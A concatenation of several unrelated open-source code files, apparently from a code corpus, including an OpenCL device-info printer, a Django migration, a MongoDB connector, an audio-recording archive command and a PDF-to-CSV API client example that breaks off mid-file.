(1 << 1): 'CL_DEVICE_TYPE_CPU',
(1 << 2): 'CL_DEVICE_TYPE_GPU',
(1 << 3): 'CL_DEVICE_TYPE_ACCELERATOR',
(1 << 4): 'CL_DEVICE_TYPE_CUSTOM'}
return options.get(info, 'Undefined Device Type')
def fp_config_formatting(info):
"""Translating the bit map into human readable categories."""
# From: OpenCL/AMDAPPSDK-3.0/include/CL/cl.h
options = [((1 << 0), 'CL_FP_DENORM'),
((1 << 1), 'CL_FP_INF_NAN'),
((1 << 2), 'CL_FP_ROUND_TO_NEAREST'),
((1 << 3), 'CL_FP_ROUND_TO_ZERO'),
((1 << 4), 'CL_FP_ROUND_TO_INF'),
((1 << 5), 'CL_FP_FMA'),
((1 << 6), 'CL_FP_SOFT_FLOAT'),
((1 << 7), 'CL_FP_CORRECTLY_ROUNDED_DIVIDE_SQRT')]
# The initial line shows the bitmap, following lines
# explicitly show the meaning and availability.
option_breakdown = [bin(info)]
for bitfield, option in options:
is_available = bool(bitfield & info)
option_breakdown.append('{}={}'.format(option, is_available))
return ('\n\t'+' '*(device_maxwidth+3)).join(option_breakdown)
def platform_extension_formatting(info):
"""Splitting the extensions and displaying each on aligned lines."""
return ('\n'+' '*(platform_maxwidth+3)).join(info.split())
def device_extension_formatting(info):
"""Splitting the extensions and displaying each on aligned lines."""
return ('\n\t'+' '*(device_maxwidth+3)).join(info.split())
# The following two option collections are lists of tuples with 2 or 3
# components. The first is the detail level at which it should be
# displayed. The second is the name of the parameter. The third is
# optional and should, if available, be a formatting function. The
# default is to use `str()`.
# Complete set of possible parameters for ocl.platform_info:
platform_info_options = [
(1, 'NAME'),
(4, 'PROFILE'),
(4, 'VENDOR'),
(1, 'VERSION'),
(2, 'EXTENSIONS', platform_extension_formatting)]
# Complete set of possible parameters for ocl.device_info:
device_info_options = [
(3, 'ADDRESS_BITS'),
(5, 'ATTRIBUTE_ASYNC_ENGINE_COUNT_NV'),
(1, 'AVAILABLE', bool),
(5, 'AVAILABLE_ASYNC_QUEUES_AMD'),
(5, 'BOARD_NAME_AMD'),
(3, 'BUILT_IN_KERNELS'),
(1, 'COMPILER_AVAILABLE', bool),
(5, 'COMPUTE_CAPABILITY_MAJOR_NV'),
(5, 'COMPUTE_CAPABILITY_MINOR_NV'),
(5, 'CORE_TEMPERATURE_ALTERA'),
(3, 'DOUBLE_FP_CONFIG', fp_config_formatting),
(1, 'DRIVER_VERSION'),
(4, 'ENDIAN_LITTLE'),
(4, 'ERROR_CORRECTION_SUPPORT', bool),
(4, 'EXECUTION_CAPABILITIES', bool),
(3, 'EXTENSIONS', device_extension_formatting),
(5, 'EXT_MEM_PADDING_IN_BYTES_QCOM'),
(5, 'GFXIP_MAJOR_AMD'),
(5, 'GFXIP_MINOR_AMD'),
(5, 'GLOBAL_FREE_MEMORY_AMD'),
(2, 'GLOBAL_MEM_CACHELINE_SIZE', memory_size),
(2, 'GLOBAL_MEM_CACHE_SIZE', memory_size),
(2, 'GLOBAL_MEM_CACHE_TYPE'),
(5, 'GLOBAL_MEM_CHANNELS_AMD'),
(5, 'GLOBAL_MEM_CHANNEL_BANKS_AMD'),
(5, 'GLOBAL_MEM_CHANNEL_BANK_WIDTH_AMD'),
(2, 'GLOBAL_MEM_SIZE', memory_size),
(3, 'GLOBAL_VARIABLE_PREFERRED_TOTAL_SIZE'),
(5, 'GPU_OVERLAP_NV'),
(3, 'HALF_FP_CONFIG', fp_config_formatting),
(3, 'HOST_UNIFIED_MEMORY', bool),
(3, 'IMAGE2D_MAX_HEIGHT'),
(3, 'IMAGE2D_MAX_WIDTH'),
(3, 'IMAGE3D_MAX_DEPTH'),
(3, 'IMAGE3D_MAX_HEIGHT'),
(3, 'IMAGE3D_MAX_WIDTH'),
(3, 'IMAGE_MAX_ARRAY_SIZE'),
(3, 'IMAGE_MAX_BUFFER_SIZE', memory_size),
(3, 'IMAGE_SUPPORT', bool),
(5, 'INTEGRATED_MEMORY_NV'),
(2, 'KERNEL_EXEC_TIMEOUT_NV'),
(1, 'LINKER_AVAILABLE', bool),
(5, 'LOCAL_MEM_BANKS_AMD'),
(2, 'LOCAL_MEM_SIZE', memory_size),
(5, 'LOCAL_MEM_SIZE_PER_COMPUTE_UNIT_AMD'),
(2, 'LOCAL_MEM_TYPE'),
(5, 'MAX_ATOMIC_COUNTERS_EXT'),
(2, 'MAX_CLOCK_FREQUENCY'),
(2, 'MAX_COMPUTE_UNITS'),
(2, 'MAX_CONSTANT_ARGS'),
(2, 'MAX_CONSTANT_BUFFER_SIZE', memory_size),
(2, 'MAX_GLOBAL_VARIABLE_SIZE'),
(2, 'MAX_MEM_ALLOC_SIZE', memory_size),
(4, 'MAX_ON_DEVICE_EVENTS'),
(4, 'MAX_ON_DEVICE_QUEUES'),
(4, 'MAX_PARAMETER_SIZE'),
(4, 'MAX_PIPE_ARGS'),
(4, 'MAX_READ_IMAGE_ARGS'),
(4, 'MAX_READ_WRITE_IMAGE_ARGS'),
(4, 'MAX_SAMPLERS'),
(2, 'MAX_WORK_GROUP_SIZE'),
(2, 'MAX_WORK_ITEM_DIMENSIONS'),
(2, 'MAX_WORK_ITEM_SIZES'),
(3, 'MAX_WRITE_IMAGE_ARGS'),
(4, 'MEM_BASE_ADDR_ALIGN'),
(5, 'ME_VERSION_INTEL'),
(4, 'MIN_DATA_TYPE_ALIGN_SIZE'),
(1, 'NAME'),
(4, 'NATIVE_VECTOR_WIDTH_CHAR'),
(4, 'NATIVE_VECTOR_WIDTH_DOUBLE'),
(4, 'NATIVE_VECTOR_WIDTH_FLOAT'),
(4, 'NATIVE_VECTOR_WIDTH_HALF'),
(4, 'NATIVE_VECTOR_WIDTH_INT'),
(4, 'NATIVE_VECTOR_WIDTH_LONG'),
(4, 'NATIVE_VECTOR_WIDTH_SHORT'),
(5, 'NUM_SIMULTANEOUS_INTEROPS_INTEL'),
(1, 'OPENCL_C_VERSION'),
(5, 'PAGE_SIZE_QCOM'),
#(5, 'PARENT_DEVICE'), # Somehow, this crashes Python.
(5, 'PARTITION_AFFINITY_DOMAIN'),
(5, 'PARTITION_MAX_SUB_DEVICES'),
(5, 'PARTITION_PROPERTIES'),
(5, 'PARTITION_TYPE'),
(5, 'PCI_BUS_ID_NV'),
(5, 'PCI_SLOT_ID_NV'),
(5, 'PIPE_MAX_ACTIVE_RESERVATIONS'),
(5, 'PIPE_MAX_PACKET_SIZE'),
(4, 'PLATFORM'),
(4, 'PREFERRED_GLOBAL_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_INTEROP_USER_SYNC'),
(4, 'PREFERRED_LOCAL_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_PLATFORM_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_VECTOR_WIDTH_CHAR'),
(4, 'PREFERRED_VECTOR_WIDTH_DOUBLE'),
(4, 'PREFERRED_VECTOR_WIDTH_FLOAT'),
(4, 'PREFERRED_VECTOR_WIDTH_HALF'),
(4, 'PREFERRED_VECTOR_WIDTH_INT'),
(4, 'PREFERRED_VECTOR_WIDTH_LONG'),
(4, 'PREFERRED_VECTOR_WIDTH_SHORT'),
(4, 'PRINTF_BUFFER_SIZE'),
(4, 'PROFILE'),
(5, 'PROFILING_TIMER_OFFSET_AMD'),
(3, 'PROFILING_TIMER_RESOLUTION'),
(4, 'QUEUE_ON_DEVICE_MAX_SIZE'),
(4, 'QUEUE_ON_DEVICE_PREFERRED_SIZE'),
(4, 'QUEUE_ON_DEVICE_PROPERTIES'),
(4, 'QUEUE_ON_HOST_PROPERTIES'),
(4, 'QUEUE_PROPERTIES'),
(4, 'REFERENCE_COUNT'),
(5, 'REGISTERS_PER_BLOCK_NV'),
(5, 'SIMD_INSTRUCTION_WIDTH_AMD'),
(5, 'SIMD_PER_COMPUTE_UNIT_AMD'),
(5, 'SIMD_WIDTH_AMD'),
(5, 'SIMULTANEOUS_INTEROPS_INTEL'),
(3, 'SINGLE_FP_CONFIG', fp_config_formatting),
(5, 'SPIR_VERSIONS'),
(5, 'SVM_CAPABILITIES'),
(5, 'THREAD_TRACE_SUPPORTED_AMD'),
(5, 'TOPOLOGY_AMD'),
(1, 'TYPE', device_type),
(1, 'VENDOR'),
(5, 'VENDOR_ID'),
(1, 'VERSION'),
(5, 'WARP_SIZE_NV'),
(5, 'WAVEFRONT_WIDTH_AMD')]
# Options which should be displayed are selected by their assigned level.
selector = lambda x: (x[0] <= detail_level)
platform_options = list(filter(selector, platform_info_options))
device_options = list(filter(selector, device_info_options))
    # Some formatting preparations
template = '{1:<{0}} : {2}'
global platform_maxwidth
platform_maxwidth = max(map(len, (t[1] for t in platform_options)))
global device_maxwidth
device_maxwidth = max(map(len, (t[1] for t in device_options)))
for platform_idx, platform in enumerate(ocl.get_platforms()):
print(' Platform {}:'.format(platform_idx))
for tup in platform_options:
# Unpacking the option tuple. If there is no specified
# formatting function at index 2, assume `str`.
name = tup[1]
formatting = str if len(tup) < 3 else tup[2]
# Attempt to retrieve the information from the device,
# and assume none is available if the retrieval fails.
try:
info = platform.get_info(getattr(ocl.platform_info, name))
            except Exception:
info = 'Parameter not available.'
formatting = str
print(template.format(platform_maxwidth, name, formatting(info)))
for device_idx, device in enumerate(platform.get_devices()):
print('\t Device {}.{}:'.format(platform_idx, device_idx))
for tup in device_options:
# Unpacking the option tuple. If there is no specified
# formatting function at index 2, assume `str`.
name = tup[1]
formatting = str if len(tup) < 3 else tup[2]
# Attempt to retrieve the information from the device,
# and assume none is available if the retrieval fails.
try:
info = device.get_info(getattr(ocl.device_info, name))
                except Exception:
info = 'Parameter not available.'
formatting = str
print('\t'+template.format(device_maxwidth, name,
formatting(info)))
print()
return
if __name__ == '__main__':
print_devices(3)
|
mit
| -4,669,192,633,866,888,000 | 36.907662 | 82 | 0.580306 | false |
smartshark/serverSHARK
|
smartshark/utils/connector.py
|
1
|
2941
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Provide common connector methods via the BaseConnector.
"""
import string
import os
import server.settings
from django.conf import settings
from mongoengine import connect
class BaseConnector(object):
"""Basic connector execution stuff that is shared between connectors."""
def __init__(self):
mongo_connection = {
'host': server.settings.DATABASES['mongodb']['HOST'],
'port': server.settings.DATABASES['mongodb']['PORT'],
'db': server.settings.DATABASES['mongodb']['NAME'],
'username': server.settings.DATABASES['mongodb']['USER'],
'password': server.settings.DATABASES['mongodb']['PASSWORD'],
'authentication_source': server.settings.DATABASES['mongodb']['AUTHENTICATION_DB'],
'connect': False
}
connect(**mongo_connection)
def _add_parameters_to_install_command(self, path_to_script, plugin):
# we may have additional parameters
command = path_to_script + " "
for argument in plugin.argument_set.all().filter(type='install').order_by('position'):
            # Add 'None' if the value is not set; this needs to be caught
            # in the plugin's install.sh.
            if not argument.install_value.strip():
                command += "None "
            else:
                command += argument.install_value + " "
return command
def _generate_plugin_execution_command(self, plugin_path, plugin_execution):
path_to_execute_script = '{}/{}/execute.sh'.format(plugin_path, str(plugin_execution.plugin))
        # we have parameters!
path_to_execute_script += " "
# Add parameter
command = path_to_execute_script + plugin_execution.get_sorted_argument_values()
        # Prepare the substitution values; use 'None' when MongoDB is not
        # secured (i.e. no user/password/auth database configured).
db_user = settings.DATABASES['mongodb']['USER']
if db_user is None or db_user == '':
db_user = 'None'
db_password = settings.DATABASES['mongodb']['PASSWORD']
if db_password is None or db_password == '':
db_password = 'None'
db_authentication = settings.DATABASES['mongodb']['AUTHENTICATION_DB']
if db_authentication is None or db_authentication == '':
db_authentication = 'None'
# Substitute stuff
return string.Template(command).safe_substitute({
'db_user': db_user,
'db_password': db_password,
'db_database': settings.DATABASES['mongodb']['NAME'],
'db_hostname': settings.DATABASES['mongodb']['HOST'],
'db_port': settings.DATABASES['mongodb']['PORT'],
'db_authentication': db_authentication,
'project_name': plugin_execution.project.name,
'plugin_path': os.path.join(plugin_path, str(plugin_execution.plugin)),
'cores_per_job': 1,
})
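# Example (sketch, not part of the class): how the placeholder substitution
# above behaves.
#
#     >>> import string
#     >>> string.Template('run.sh $db_user $db_port').safe_substitute(
#     ...     {'db_user': 'None', 'db_port': 27017})
#     'run.sh None 27017'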
|
apache-2.0
| -9,102,070,737,227,791,000 | 36.705128 | 104 | 0.609317 | false |
KuangEleven/OreoRank
|
oreoranksite/oreorankapp/migrations/0001_initial.py
|
1
|
1191
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 00:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Cookie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='CookieScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('score', models.FloatField()),
('cookie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='oreorankapp.Cookie')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
gpl-2.0
| -4,792,136,927,355,026,000 | 33.028571 | 118 | 0.600336 | false |
HaroldMills/Vesper
|
vesper/command/add_recording_audio_files_command.py
|
1
|
24401
|
"""Module containing class `AddRecordingAudioFilesCommand`."""
from collections import defaultdict
from pathlib import Path, PureWindowsPath
import csv
import datetime
import logging
import random
from django.db import transaction
from vesper.archive_paths import archive_paths
from vesper.command.command import Command, CommandExecutionError
from vesper.django.app.models import Recording, RecordingFile
from vesper.singleton.recording_manager import recording_manager
import vesper.command.command_utils as command_utils
import vesper.command.recording_utils as recording_utils
_CSV_FILE_PATH = (
'/Users/harold/Desktop/NFC/Data/MPG Ranch/2012-2016 Recording File Lists/'
'2016_Archive_results.csv')
"""
Path of CSV file containing information about MPG Ranch recording audio
files that Debbie Leick generated on her computer. This file is used
for testing purposes only.
"""
_SIMULATED_ERROR_PROBABILITY = 0
"""
Simulated recording file read error probability.
This is for simulating file read errors during testing. For normal
operation it should be zero.
"""
class AddRecordingAudioFilesCommand(Command):
extension_name = 'add_recording_audio_files'
def __init__(self, args):
super().__init__(args)
get = command_utils.get_required_arg
self._station_names = frozenset(get('stations', args))
self._start_date = get('start_date', args)
self._end_date = get('end_date', args)
self._dry_run = get('dry_run', args)
def execute(self, job_info):
self._job_info = job_info
self._logger = logging.getLogger()
try:
self._log_intro()
# Get mapping from station names to nights to lists of
# recording files sorted by start time.
files = self._get_files(archive_paths.recording_dir_paths)
# self._show_files(files)
# self._compare_local_and_mpg_recording_files(files)
# Get mapping from station names to nights to lists of
# recordings sorted by start time.
recordings = self._get_recordings()
recording_files = self._assign_files_to_recordings(
files, recordings)
with transaction.atomic():
self._add_recording_files(recording_files)
except Exception as e:
log = self._logger.error
log('Command failed with an exception.')
log('The exception message was:')
log(f' {str(e)}')
log('The archive was not modified.')
log('See below for exception traceback.')
raise
return True
def _log_intro(self):
log = self._logger.info
if self._dry_run:
log('This command is running in dry run mode. After this '
'message it will log the same messages that it would '
'during normal operation, often including messages '
'indicating that it is modifying the archive database. '
'However, it will not actually modify the database.')
log('In this log, a recording in the archive database is '
'described by its station name, start time, sample rate, '
'number of channels, length in sample frames, and (in '
            'parentheses) the number of clips per channel, for example:')
log(' Station 2020-02-10 01:23:45+00:00 24000.0 2 900000000 '
'(100, 200)')
log('A recording file in the archive database is described by its '
'file number, file name, sample rate, number of channels, '
'length in sample frames, and recording start offset in '
'sample frames, for example:')
log(' 0 Station_20200210_012345.wav 24000.0 2 500000000 0')
log('A recording file on disk is described before parsing by '
'its file system path, for example:')
log(r' C:\Users\Nora\2020 Archive\Recordings'
r'\Station_20200210_012345.wav')
log('or after parsing by its file name, sample rate, number '
'of channels, length in sample frames, and recording start '
'offset in sample frames, for example:')
log(' Station_20200210_012345.wav 24000.0 2 500000000 0')
def _get_files(self, recordings_dir_paths):
spec = {
'name': 'MPG Ranch Recording File Parser',
'arguments': {
'station_name_aliases_preset': 'Station Name Aliases'
}
}
file_parser = recording_utils.create_recording_file_parser(spec)
# `files` maps station names to nights to lists of file info bunches.
files = defaultdict(lambda: defaultdict(list))
# Build mapping from station names to nights to lists of files.
for dir_path in recordings_dir_paths:
for file_path in dir_path.glob('**/*.wav'):
try:
f = self._parse_file(file_path, file_parser)
except Exception as e:
class_name = e.__class__.__name__
self._logger.warning(
f'Could not parse recording file "{file_path}". '
f'Attempt raised {class_name} exception with message: '
f'{str(e)} File will be ignored.')
else:
# file parse succeeded
station_name = f.station.name
if station_name in self._station_names:
night = f.station.get_night(f.start_time)
if night >= self._start_date and \
night <= self._end_date:
files[station_name][night].append(f)
# Sort file lists by start time.
for station_files in files.values():
for night_files in station_files.values():
night_files.sort(key=lambda f: f.start_time)
return files
def _parse_file(self, file_path, file_parser):
if random.random() < _SIMULATED_ERROR_PROBABILITY:
raise Exception('A simulated error occurred.')
else:
return file_parser.parse_file(str(file_path))
def _show_files(self, files):
for station_name in sorted(files.keys()):
print(station_name)
station_files = files[station_name]
for night in sorted(station_files.keys()):
print(f' {night}')
night_files = station_files[night]
for f in night_files:
print(
f' "{f.path}",{f.num_channels},'
f'{f.sample_rate},{f.length}')
def _compare_local_and_mpg_recording_files(self, local_files):
local_files = self._create_local_files_dict(local_files)
mpg_files = self._create_mpg_files_dict(_CSV_FILE_PATH)
# self._show_recording_files_dict('local files', local_files)
# self._show_recording_files_dict('MPG files', mpg_files)
print()
print('local - MPG:')
self._show_differences(local_files, mpg_files)
print()
print('MPG - local:')
self._show_differences(mpg_files, local_files)
def _create_local_files_dict(self, files):
result = {}
for station_files in files.values():
for night_files in station_files.values():
for f in night_files:
file_name = Path(f.path).name
result[file_name] = (
f.num_channels, f.sample_rate, f.length)
return result
def _create_mpg_files_dict(self, csv_file_path):
result = {}
with open(csv_file_path, newline='') as file_:
reader = csv.reader(file_)
for row in reader:
file_name = PureWindowsPath(row[0]).name
channel_num = int(row[1])
sample_rate = float(row[2])
length = int(row[3])
result[file_name] = (channel_num, sample_rate, length)
return result
def _show_recording_files_dict(self, title, files):
print(f'{title}:')
for file_name in sorted(files.keys()):
info = files[file_name]
print(file_name, info)
def _show_differences(self, a, b):
for file_name in sorted(a.keys()):
b_info = b.get(file_name)
if b_info is None:
print(f'{file_name} absent')
elif b_info != a[file_name]:
print(f'{file_name} info differs: {a[file_name]} {b_info}')
def _get_recordings(self):
# `recordings` maps station names to nights to lists of recordings.
recordings = defaultdict(lambda: defaultdict(list))
# Build mapping from station names to nights to lists of recordings.
for r in Recording.objects.all().order_by(
'station__name', 'start_time'):
station_name = r.station.name
if station_name in self._station_names:
night = r.station.get_night(r.start_time)
if night >= self._start_date and night <= self._end_date:
recordings[r.station.name][night].append(r)
# Sort recording lists by start time.
for station_recordings in recordings.values():
for night_recordings in station_recordings.values():
night_recordings.sort(key=lambda r: r.start_time)
return recordings
def _assign_files_to_recordings(self, files, recordings):
"""Builds a mapping from recordings to lists of recording files."""
# Start with a mapping from recordings to empty lists. We do this
# to ensure there's an item in the mapping for every recording.
recording_files = {}
for station_name in sorted(recordings.keys()):
station_recordings = recordings[station_name]
for night in sorted(station_recordings.keys()):
for r in station_recordings[night]:
recording_files[r] = []
for station_name in sorted(files.keys()):
station_files = files[station_name]
for night in sorted(station_files.keys()):
night_recordings = recordings[station_name][night]
night_files = station_files[night]
for f in night_files:
recording = self._assign_file_to_recording(
f, night_recordings)
if recording is None:
# could not find recording for file
self._log_unassigned_file(f)
else:
# found recording for file
recording_files[recording].append(f)
return recording_files
def _assign_file_to_recording(self, file_, recordings):
recording = None
max_intersection = 0
for r in recordings:
# If recording has same start time as file, assign file to it,
# regardless of any intersection considerations. (We encountered
# a case where a file was misassigned to a recording with which
# it overlapped more than it did with another recording that
# shared its start time!)
if r.start_time == file_.start_time:
recording = r
break
intersection = self._get_intersection_duration(r, file_)
if intersection > max_intersection:
recording = r
max_intersection = intersection
return recording
def _get_intersection_duration(self, r, file_):
r_start = r.start_time
r_end = r.end_time
f_start = file_.start_time
duration = datetime.timedelta(seconds=file_.length / file_.sample_rate)
f_end = f_start + duration
if f_end <= r_start or f_start >= r_end:
return 0
else:
i_start = max(r_start, f_start)
i_end = min(r_end, f_end)
return (i_end - i_start).total_seconds()
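    # Example (sketch): a recording spanning 01:00-02:00 and a file spanning
    # 01:30-02:30 intersect for 1800 seconds.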
def _log_unassigned_file(self, f):
file_string = self._get_file_string(f)
self._logger.warning(
f'Could not find recording for file {file_string}.')
def _add_recording_files(self, recording_files):
recordings = sorted(
recording_files.keys(),
key=lambda r: (r.station.name, r.start_time))
for r in recordings:
self._add_recording_files_aux(r, recording_files[r])
def _add_recording_files_aux(self, recording, files):
log_info = self._logger.info
r = recording
recording_string = self._get_recording_string(r)
log_info(f'Processing recording {recording_string}...')
db_files = list(r.files.all().order_by('file_num'))
if len(db_files) != 0:
# recording already has files in database
if self._compare_files(db_files, files):
log_info(
' Recording has matching files in archive database '
'and on disk.')
self._shorten_recording_length_if_needed(r, files)
else:
# recording has no files in database
if self._check_num_files(files) and \
self._check_file_sample_rates(r, files) and \
self._check_file_channels(r, files) and \
self._check_file_lengths(r, files):
self._add_files_to_database(r, files)
self._shorten_recording_length_if_needed(r, files)
def _get_recording_string(self, r):
clip_counts = self._get_recording_clip_counts(r)
return (
f'{r.station.name} {r.start_time} {r.sample_rate} '
f'{r.num_channels} {r.length} {clip_counts}')
def _get_recording_clip_counts(self, recording):
channels = recording.channels.all().order_by('channel_num')
return tuple(c.clips.count() for c in channels)
def _compare_files(self, db_files, disk_files):
if len(db_files) != 0 and len(disk_files) == 0:
self._report_missing_disk_files(db_files)
return False
elif self._files_match(db_files, disk_files):
return True
else:
self._report_files_mismatch(db_files, disk_files)
return False
def _report_missing_disk_files(self, db_files):
self._logger.warning(
' Recording has files in the archive database, but not '
'on disk.')
self._log_database_files(db_files, self._logger.warning)
self._log_no_action()
def _log_database_files(self, db_files, log):
log(' The database files are:')
for f in db_files:
log(
f' {f.file_num} {Path(f.path).name} '
f'{f.sample_rate} {f.num_channels} {f.length} '
f'{f.start_index}')
def _log_no_action(self):
self._logger.warning(' No action will be taken for this recording.')
def _files_match(self, db_files, disk_files):
if len(db_files) != len(disk_files):
return False
pairs = zip(db_files, disk_files)
return all(self._files_match_aux(*p) for p in pairs)
def _files_match_aux(self, db_file, disk_file):
db_name = Path(db_file.path).name
disk_name = Path(disk_file.path).name
return (
db_name == disk_name and
db_file.num_channels == disk_file.num_channels and
db_file.length == disk_file.length and
db_file.sample_rate == disk_file.sample_rate)
def _report_files_mismatch(self, db_files, disk_files):
log = self._logger.warning
log(
' Recording already has files in the archive '
'database, but they do not match the files on disk.')
self._log_database_files(db_files, log)
self._log_disk_files('The disk files are:', disk_files, log)
self._log_no_action()
def _log_disk_files(self, title, disk_files, log):
log(f' {title}')
for f in disk_files:
file_string = self._get_file_string(f)
log(f' {file_string}')
def _get_file_string(self, f):
return (
f'{Path(f.path).name} {f.start_time} {f.sample_rate} '
f'{f.num_channels} {f.length}')
def _shorten_recording_length_if_needed(self, recording, files):
r_length = recording.length
f_length = sum(f.length for f in files)
sample_rate = recording.sample_rate
two_seconds = 2 * sample_rate
if r_length - f_length == two_seconds:
# Recording length specified in database is exactly two
# seconds longer than total length of files. The
# `populate_archive` script that was used to populate
# web archives from desktop archives added two seconds
# to recording durations to try to ensure that the times
# of clips created by the original Old Bird detectors
# were within the time span of the recording. We remove
# this padding since it is not needed.
self._logger.info(
' Reducing recording duration by two seconds to '
'remove unneeded padding added by populate_archive script.')
recording.length = f_length
span = (f_length - 1) / sample_rate
recording.end_time = \
recording.start_time + datetime.timedelta(seconds=span)
if not self._dry_run:
recording.save()
def _check_num_files(self, files):
if len(files) == 0:
self._logger.warning(
' No files were found either in the archive database '
'or on disk for this recording.')
return False
else:
return True
def _check_file_sample_rates(self, recording, files):
sample_rate = recording.sample_rate
for f in files:
if f.sample_rate != sample_rate:
self._logger.warning(
' The sample rate of one or more of this '
"recording's files does not match that of the "
'recording.')
self._log_disk_files(
'The files are:', files, self._logger.warning)
self._log_no_action()
return False
# If we get here, the sample rates of all of the files
# matched the sample rate of the recording.
return True
def _check_file_channels(self, recording, files):
num_channels = recording.num_channels
for f in files:
if f.num_channels != num_channels:
self._logger.warning(
' The number of channels of one or more of this '
"recording's files does not match that of the "
'recording.')
self._log_disk_files(
'The files are:', files, self._logger.warning)
self._log_no_action()
return False
# If we get here, the number of channels of all of the files
# matched the number of channels of the recording.
return True
def _check_file_lengths(self, recording, files):
r_length = recording.length
f_length = sum(f.length for f in files)
two_seconds = 2 * recording.sample_rate
# The `populate_archive` script that was used to populate
# web archives from desktop archives added two seconds
# to recording durations to try to ensure that the times
# of clips created by the original Old Bird detectors
# were within the time span of the recording. We take
# that into consideration in the following comparison.
if r_length != f_length and r_length - f_length != two_seconds:
# recording and file lengths don't match
self._logger.warning(
" The total length of this recording's files "
'does not match that of the recording.')
self._log_disk_files('The files are:', files, self._logger.warning)
self._log_no_action()
return False
else:
# recording and file lengths match
return True
def _add_files_to_database(self, recording, files):
self._log_disk_files(
'Adding files to archive database:', files, self._logger.info)
start_index = 0
for file_num, f in enumerate(files):
# We store all paths in the archive database as POSIX
# paths, even on Windows, for portability, since Python's
# `pathlib` module recognizes the slash as a path separator
# on all platforms, but not the backslash.
path = self._get_relative_path(f.path).as_posix()
file_ = RecordingFile(
recording=recording,
file_num=file_num,
start_index=start_index,
length=f.length,
path=path)
if not self._dry_run:
file_.save()
start_index += f.length
def _get_relative_path(self, abs_path):
rm = recording_manager
try:
_, rel_path = rm.get_relative_recording_file_path(abs_path)
except ValueError:
dir_paths = rm.recording_dir_paths
if len(dir_paths) == 1:
s = f'the recording directory "{dir_paths[0]}"'
else:
path_list = str(list(dir_paths))
s = f'any of the recording directories {path_list}'
raise CommandExecutionError(
f'Recording file "{abs_path}" is not in {s}.')
return rel_path
|
mit
| -8,053,852,655,946,827,000 | 33.759259 | 79 | 0.512602 | false |
jimstorch/tokp
|
raid_parser_splits.py
|
1
|
1163
|
import glob
import time
import sys
import os
from optparse import OptionParser
#from tokp_lib.raidweeks_xml import RaidWeeksXML
#from tokp_lib.raidweeks_xml import raidweek_output
#from tokp_lib.datetime_range import datetime_range
from tokp_lib.roster import get_roster
from tokp_lib.parse_combat import parse_combat
from tokp_lib.parse_chat import parse_chat
from tokp_lib.write_summary import write_summary
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
(options, args) = parser.parse_args()
## Define the start of the raid week (1=Monday, 6=Sunday)
options.raidweek_start = 2
t1 = time.time()
## Load the roster
roster = get_roster('roster/roster.txt')
## Parse the combat log looking for raids
logfiles = glob.glob('logs/split_logs/*.txt')
for combatlog in logfiles:
raids = parse_combat(combatlog, roster)
## Parse the chat log looking for loots
loots = []
#loots = parse_chat(options.chatlog, roster, options.name)
## Create the summary file
write_summary(options, raids, loots)
t2 = time.time()
print "[complete] Process time was %f seconds." % (t2 - t1)
|
gpl-3.0
| -3,864,553,970,490,699,000 | 27.075 | 62 | 0.710232 | false |
bytescout/ByteScout-SDK-SourceCode
|
Cloud API Server/PDF To CSV API/Python/Convert PDF To CSV From Uploaded File Asynchronously/ConvertPdfToCSVFromUploadedFileAsynchronously.py
|
1
|
4735
|
""" Cloud API asynchronous "PDF To Text" job example.
Allows to avoid timeout errors when processing huge or scanned PDF documents.
"""
import os
import requests # pip install requests
import time
import datetime
# Please NOTE: In this sample we're assuming the Cloud API Server is hosted at "https://localhost".
# If it's not, please replace this with your hosting URL.
# Base URL for PDF.co Web API requests
BASE_URL = "https://localhost"
# Source PDF file
SourceFile = ".\\sample.pdf"
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination CSV file name
DestinationFile = ".\\result.csv"
# (!) Make asynchronous job
Async = True
def main(args = None):
uploadedFileUrl = uploadFile(SourceFile)
if (uploadedFileUrl != None):
convertPdfToCSV(uploadedFileUrl, DestinationFile)
def convertPdfToCSV(uploadedFileUrl, destinationFile):
"""Converts PDF To CSV using PDF.co Web API"""
# Prepare URL for 'PDF To CSV' API request
url = "{}/pdf/convert/to/csv?async={}&name={}&password={}&pages={}&url={}".format(
BASE_URL,
Async,
os.path.basename(destinationFile),
Password,
Pages,
uploadedFileUrl
)
# Execute request and get response as JSON
response = requests.get(url, headers={ "content-type": "application/octet-stream" })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Asynchronous job ID
jobId = json["jobId"]
# URL of the result file
resultFileUrl = json["url"]
# Check the job status in a loop.
# If you don't want to pause the main thread you can rework the code
# to use a separate thread for the status checking and completion.
while True:
status = checkJobStatus(jobId) # Possible statuses: "working", "failed", "aborted", "success".
# Display timestamp and status (for demo purposes)
print(datetime.datetime.now().strftime("%H:%M.%S") + ": " + status)
if status == "success":
# Download result file
r = requests.get(resultFileUrl, stream=True)
if (r.status_code == 200):
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
print(f"Request error: {response.status_code} {response.reason}")
break
elif status == "working":
# Pause for a few seconds
time.sleep(3)
else:
print(status)
break
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
def checkJobStatus(jobId):
"""Checks server job status"""
url = f"{BASE_URL}/job/check?jobid={jobId}"
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
return json["status"]
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
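# Example job-status payload (sketch; only the field used above is shown):
#
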